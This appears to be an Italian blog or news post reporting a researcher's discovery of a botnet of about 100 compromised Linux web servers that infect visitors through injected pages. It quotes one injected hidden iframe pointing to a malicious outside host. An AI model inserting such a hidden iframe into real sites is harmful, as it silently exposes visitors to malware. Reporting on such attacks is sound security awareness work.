Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
Tale tecnica non fa altro che aumentare le macchine zombie.
Cosa avviene in parole semplici :
i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo installato nginx potente server http e un mail proxy server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.
Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.
Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.